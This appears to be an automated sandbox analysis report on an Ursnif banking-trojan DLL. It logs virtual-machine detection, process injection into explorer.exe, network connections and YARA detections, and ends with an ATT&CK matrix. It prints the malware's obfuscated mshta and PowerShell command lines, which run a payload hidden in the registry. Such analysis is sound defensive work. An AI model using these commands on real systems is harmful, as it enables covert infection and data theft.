                      Source: explorer.exe, 00000025.00000000.420208228.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
                      Source: explorer.exe, 00000025.00000000.415342028.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
                      Source: explorer.exe, 00000025.00000000.446215428.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000025.00000000.420208228.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: control.exe, 00000022.00000002.1120355599.0000016545F88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}\
                      Source: control.exe, 00000022.00000002.1120355599.0000016545F88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
                      Source: control.exe, 00000022.00000002.1120355599.0000016545F88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\CkK@
                      Source: explorer.exe, 00000025.00000000.424617292.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000025.00000000.419520780.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
                      Source: rundll32.exe, 00000002.00000002.453750013.0000000003197000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.453564071.000000000313A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000025.00000000.437682607.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000025.00000000.420208228.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
                      Source: mshta.exe, 00000018.00000003.363685356.000002AE315B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}
                      Source: explorer.exe, 00000025.00000000.419693379.000000000814C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 00000025.00000000.420208228.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F6EC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,2_2_04F6EC00
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F68FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,2_2_04F68FEC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 176.10.119.68 80Jump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Source: C:\Windows\explorer.exeSection loaded: unknown target: unknown protection: execute and read and write
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF61B8E12E0Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: E50000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF61B8E12E0Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 49E000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFC86661580Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 2960000Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 7FFC86661580Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 4A2000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFC86661580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2600000
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC86661580 protect: page execute read
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC86661580 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: unknown base: 7FFC86661580 protect: page execute read
                      Allocates memory in foreign processes
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\control.exe base: E50000 protect: page execute and read and writeJump to behavior
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2600000 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3968 base: 49E000 value: 00Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3968 base: 7FFC86661580 value: EBJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3968 base: 2960000 value: 80Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3968 base: 7FFC86661580 value: 40Jump to behavior
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3968 base: 4A2000 value: 00
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3968 base: 7FFC86661580 value: EB
                      Source: C:\Windows\System32\control.exeMemory written: PID: 3968 base: 2600000 value: 80
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 2388Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread register set: target process: 3968Jump to behavior
                      Source: C:\Windows\System32\control.exeThread register set: target process: 3968
                      Source: C:\Windows\explorer.exeThread register set: target process: 4168
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 86661580Jump to behavior
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 86661580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 86661580
                      Source: C:\Windows\explorer.exeThread created: unknown EIP: 86661580
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kxac='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kxac).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\lokvQRcUe0.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ltqefvure -value gp; new-alias -name vftdnxvda -value iex; vftdnxvda ([System.Text.Encoding]::ASCII.GetString((ltqefvure "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b5khtopv.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kikzslfg.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESE691.tmp" "c:\Users\user\AppData\Local\Temp\CSC7CF5F35C720441118B71E863AB44B87A.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFE5F.tmp" "c:\Users\user\AppData\Local\Temp\CSC72CD5E3A7BFC47C08453C5B847B47E88.TMP"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                      Source: explorer.exe, 00000025.00000000.432716315.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.410487415.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.446191269.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
                      Source: explorer.exe, 00000025.00000000.446591267.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.449384808.000000000814C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.437464495.000000000814C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000025.00000000.446591267.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.437583059.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.415779919.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000025.00000000.446591267.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.437583059.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.415779919.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000025.00000000.433090722.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.410508381.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000025.00000000.415389104.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
                      Source: explorer.exe, 00000025.00000000.446591267.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.437583059.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000025.00000000.415779919.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A13365 cpuid 2_2_04A13365
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04F781F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,2_2_04F781F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A176BB GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,2_2_04A176BB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A16D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,2_2_04A16D78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04A13365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,2_2_04A13365

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294564948.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294395671.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294731571.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.338694096.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294789206.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339835630.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294648025.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294608365.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294468322.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.340707199.000000000533C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6380, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2388, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4a10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54e6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54b94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.406864821.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.405146209.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.404521640.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339724690.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.452738390.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000002.00000003.393059229.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294681357.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294564948.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.408736097.0000000006318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407678456.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294395671.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.407599329.0000016547E1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294731571.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.338694096.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294789206.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.402164003.000002456F5AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339835630.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294648025.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294608365.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.294468322.0000000005538000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.340707199.000000000533C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6380, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6564, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 2388, type: MEMORYSTR
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.4d994a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.rundll32.exe.4a10000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54e6b48.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.54b94a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.543a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.454256752.00000000051BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339689659.000000000543A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.406864821.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.405146209.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.404521640.0000000000DA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.339724690.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.452738390.0000000004D99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      1
                      Valid Accounts                      		1
                      Windows Management Instrumentation                      		1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Obfuscated Files or Information                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts3
                      Native API                      		Boot or Logon Initialization Scripts1
                      Access Token Manipulation                      		1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)813
                      Process Injection                      		1
                      Masquerading                      		Security Account Manager3
                      File and Directory Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
